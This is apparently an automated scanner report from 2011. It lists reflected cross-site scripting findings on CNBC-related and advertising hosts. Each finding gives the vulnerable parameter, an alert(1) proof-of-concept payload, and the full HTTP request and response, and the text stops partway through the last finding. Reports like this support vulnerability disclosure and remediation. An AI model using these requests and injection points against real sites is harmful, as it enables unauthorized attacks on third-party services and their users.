The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 1e863<script>alert(1)</script>03af89ea0d9 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1515491&pid=22577671e863<script>alert(1)</script>03af89ea0d9&ps=-1&zw=336&zh=300&url=http%3A//www.cnbc.com/&v=5&dct=Stock%20Market%20News%2C%20Business%20News%2C%20Financial%2C%20Earnings%2C%20World%20Market%20News%20and%20Information%20-%20CNBC&ref=http%3A//search.cnbc.com/main.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26source%3D%28The%2520Associated%2520Press%2520OR%2520Reuters%2520OR%2520AFX%2520OR%2520The%2520New%2520York%2520Times%2520OR%2520CNBC.COM%29%26layout%3DNoPic%26pubtime%3D0%26pubfreq%3Dh HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:21 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "22577671e863<script>alert(1)</script>03af89ea0d9"

   
                                                           </head>
...[SNIP]...

3.2. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 34bbc--><script>alert(1)</script>f035f2c61ed was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=151549134bbc--><script>alert(1)</script>f035f2c61ed&pid=2257767&ps=-1&zw=336&zh=300&url=http%3A//www.cnbc.com/&v=5&dct=Stock%20Market%20News%2C%20Business%20News%2C%20Financial%2C%20Earnings%2C%20World%20Market%20News%20and%20Information%20-%20CNBC&ref=http%3A//search.cnbc.com/main.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26source%3D%28The%2520Associated%2520Press%2520OR%2520Reuters%2520OR%2520AFX%2520OR%2520The%2520New%2520York%2520Times%2520OR%2520CNBC.COM%29%26layout%3DNoPic%26pubtime%3D0%26pubfreq%3Dh HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:19 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3548
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "151549134bbc--><script>alert(1)</script>f035f2c61ed" -->
...[SNIP]...

3.3. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 1452a--><script>alert(1)</script>8a3c8bebaae was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1515491&pid=2257767&ps=-11452a--><script>alert(1)</script>8a3c8bebaae&zw=336&zh=300&url=http%3A//www.cnbc.com/&v=5&dct=Stock%20Market%20News%2C%20Business%20News%2C%20Financial%2C%20Earnings%2C%20World%20Market%20News%20and%20Information%20-%20CNBC&ref=http%3A//search.cnbc.com/main.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26source%3D%28The%2520Associated%2520Press%2520OR%2520Reuters%2520OR%2520AFX%2520OR%2520The%2520New%2520York%2520Times%2520OR%2520CNBC.COM%29%26layout%3DNoPic%26pubtime%3D0%26pubfreq%3Dh HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:24 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3987
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-11452a--><script>alert(1)</script>8a3c8bebaae" -->
   
...[SNIP]...

3.4. http://ads.rnmd.net/getAds [adDiv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.rnmd.net
Path:   /getAds

Issue detail

The value of the adDiv request parameter is copied into the HTML document as plain text between tags. The payload 5a098<img%20src%3da%20onerror%3dalert(1)>13fd8da2931 was submitted in the adDiv parameter. This input was echoed as 5a098<img src=a onerror=alert(1)>13fd8da2931 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /getAds?delivery=jsonp&adType=banner&adDiv=rnmdad5a098<img%20src%3da%20onerror%3dalert(1)>13fd8da2931&appId=cnbc_web&t=other,OFFDECK&w=300&h=50&v=1&ck=1315339668282 HTTP/1.1
Host: ads.rnmd.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://m.cnbc.com/mytestc3e92%27-prompt(document.location)-%27f261e685920/ipecho.php

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:07:53 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache
x-rnmd-pc: 208.91.189.56
Content-Type: application/x-javascript
Content-Length: 709
Set-Cookie: personCookie=208.91.189.56.ec26afb2-0d15-422b-819b-848bfbbe52d8; Expires=Wed, 05-Sep-2012 15:07:53 GMT
Connection: close

net.rnmd.sdk._private.JsonHelper.completeRequest({"personCookie":"208.91.189.56.ec26afb2-0d15-422b-819b-848bfbbe52d8","adDiv":"rnmdad5a098<img src=a onerror=alert(1)>13fd8da2931","htmlPayload":"<div style=\"text-align: center\">
...[SNIP]...

3.5. http://api-cdn.cnbc.com/api/chart/chart.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api-cdn.cnbc.com
Path:   /api/chart/chart.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 34781<script>alert(1)</script>ee34ae3f437 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/chart/chart.asp?34781<script>alert(1)</script>ee34ae3f437=1 HTTP/1.1
Host: api-cdn.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Content-Type: text/html
Cache-Control: private
Expires: Tue, 06 Sep 2011 16:25:59 GMT
X-Powered-By: ASP.NET
IISExport: This web site was exported using IIS Export v4.2
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Date: Tue, 06 Sep 2011 17:05:59 GMT
Content-Length: 182
Connection: close

<pre>An Error occurred with this request.

34781<script>alert(1)</script>ee34ae3f437=1</pre>&34781<script>alert(1)</script>ee34ae3f437=1&DCLCore.InternalID=CNAPI">Test link</a><br />

3.6. http://api-public.addthis.com/url/shares.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api-public.addthis.com
Path:   /url/shares.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c34f5<script>alert(1)</script>a13262bf45d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url/shares.json?url=http%3A%2F%2Fwww.dove.us%2FProducts%2FHair%2F&callback=_ate.cbs.sc_httpwwwdoveusProductsHair68c34f5<script>alert(1)</script>a13262bf45d HTTP/1.1
Host: api-public.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.dove.us/Products/Hair/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,72|36

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=600
Content-Type: application/javascript;charset=UTF-8
Date: Tue, 06 Sep 2011 16:45:50 GMT
Content-Length: 96
Connection: close

_ate.cbs.sc_httpwwwdoveusProductsHair68c34f5<script>alert(1)</script>a13262bf45d({"shares":19});

3.7. http://api.bizographics.com/v1/profile.json [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload e1c14<script>alert(1)</script>d994c816c62 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?api_key=7a1b8d0563d44781afdd2ab0834934ffe1c14<script>alert(1)</script>d994c816c62&callback=_bizo_callback HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:33:13 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 92
Connection: keep-alive

Unknown API key: (7a1b8d0563d44781afdd2ab0834934ffe1c14<script>alert(1)</script>d994c816c62)

3.8. http://api.bizographics.com/v1/profile.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e6718<script>alert(1)</script>2d7bd36d61c was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?api_key=7a1b8d0563d44781afdd2ab0834934ff&callback=_bizo_callbacke6718<script>alert(1)</script>2d7bd36d61c HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Tue, 06 Sep 2011 15:33:16 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 204
Connection: keep-alive

_bizo_callbacke6718<script>alert(1)</script>2d7bd36d61c({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

3.9. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 5af80<script>alert(1)</script>e6879303a2a was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a55af80<script>alert(1)</script>e6879303a2a&callback_url=http://rt.legolas-media.com/lgrt?ci=1%26ei=21%26ti=95%26vi=11%26sti=28%26sei=0%26sci=0%26sai=0%26smi=0%26pbi=0%26sts=1315321124004408%26sui=fb069b82-5953-4473-8ae5-0a80415bcdc8 HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KZAAQ0nYgPzjaj5XcunNcMDa7Re6IGD4lIaN8iioqfwkiiAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQ9FMNe8GIqf5OfgZsnbA3YEVUJBxdqAyBEYneLAL1RICIFxuwxR1V0fFw8K2uMipCEipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:00:50 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1ab5c8f2c82f8e20ad7e6bdfc8;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 92
Connection: keep-alive

Unknown API key: (798c7ba2e6b04aec86d660f36f6341a55af80<script>alert(1)</script>e6879303a2a)

3.10. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload db976<script>alert(1)</script>5d2b699441d was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a5&callback_url=db976<script>alert(1)</script>5d2b699441d HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KZAAQ0nYgPzjaj5XcunNcMDa7Re6IGD4lIaN8iioqfwkiiAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQ9FMNe8GIqf5OfgZsnbA3YEVUJBxdqAyBEYneLAL1RICIFxuwxR1V0fFw8K2uMipCEipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:00:52 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1ab5c8f2c82f8e20ad7e6bdfc8;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: db976<script>alert(1)</script>5d2b699441d

3.11. http://api.cnbc.com/api/chart/chart.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.cnbc.com
Path:   /api/chart/chart.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 90215<script>alert(1)</script>736c487a586 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/chart/chart.asp?90215<script>alert(1)</script>736c487a586=1 HTTP/1.1
Host: api.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 17:06:00 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 182
Expires: Tue, 06 Sep 2011 16:26:00 GMT
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"

<pre>An Error occurred with this request.

90215<script>alert(1)</script>736c487a586=1</pre>&90215<script>alert(1)</script>736c487a586=1&DCLCore.InternalID=CNAPI">Test link</a><br />

3.12. http://api.cnbc.com/api/movers/movers.asp [chartType parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.cnbc.com
Path:   /api/movers/movers.asp

Issue detail

The value of the chartType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98f0d"><script>alert(1)</script>2d1497842a9 was submitted in the chartType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/movers/movers.asp?chartType=gainers98f0d"><script>alert(1)</script>2d1497842a9&rowCount=3&link=quote HTTP/1.1
Host: api.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; __qseg=Q_D; s_nr=1315338989816; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CNews%25257CAllT%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520cnbc_multionclick%252528%252527http%25253A//www.cnbc.com/%252527%252529%25253B%25257D%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 14:57:13 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: private
Expires: Tue, 06 Sep 2011 14:17:13 GMT
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Content-Length: 1975


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>Market Movers</title>
   <link rel='stylesheet' ty
...[SNIP]...
<div id="module" rowCount="3" chartType="gainers98f0d"><script>alert(1)</script>2d1497842a9">
...[SNIP]...

3.13. http://api.cnbc.com/api/movers/movers.asp [rowCount parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.cnbc.com
Path:   /api/movers/movers.asp

Issue detail

The value of the rowCount request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 467b2"><script>alert(1)</script>23b923cf03b was submitted in the rowCount parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/movers/movers.asp?chartType=gainers&rowCount=3467b2"><script>alert(1)</script>23b923cf03b&link=quote HTTP/1.1
Host: api.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; __qseg=Q_D; s_nr=1315338989816; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CNews%25257CAllT%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520cnbc_multionclick%252528%252527http%25253A//www.cnbc.com/%252527%252529%25253B%25257D%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 14:57:16 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: private
Expires: Tue, 06 Sep 2011 14:17:15 GMT
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Content-Length: 53613


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>Market Movers</title>
   <link rel='stylesheet' ty
...[SNIP]...
<div id="module" rowCount="3467b2"><script>alert(1)</script>23b923cf03b" chartType="gainers">
...[SNIP]...

3.14. http://api.viglink.com/api/ping [jsonp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/ping

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 3a9ec<script>alert(1)</script>4d02caaf2cd was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/ping?format=jsonp&key=021de175e1e571c67cfaeea3c68d72e8&loc=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&v=1&jsonp=vglnk_jsonp_131534117167203a9ec<script>alert(1)</script>4d02caaf2cd HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
Origin: http://www.readwriteweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: http://www.readwriteweb.com
Cache-Control: no-store, no-cache, must-revalidate
Content-Language: en-US
Content-Type: text/javascript;charset=UTF-8
Date: Tue, 06 Sep 2011 15:33:39 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Content-Length: 160
Connection: keep-alive

vglnk_jsonp_131534117167203a9ec<script>alert(1)</script>4d02caaf2cd(1315323219590,2000,[],[],{"plugins":{},"timeClick":true,"debug":false,"timePing":false},[]);

3.15. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload b7be8<script>alert(1)</script>8499cdf77af was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2b7be8<script>alert(1)</script>8499cdf77af&c2=1000004&c3=&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
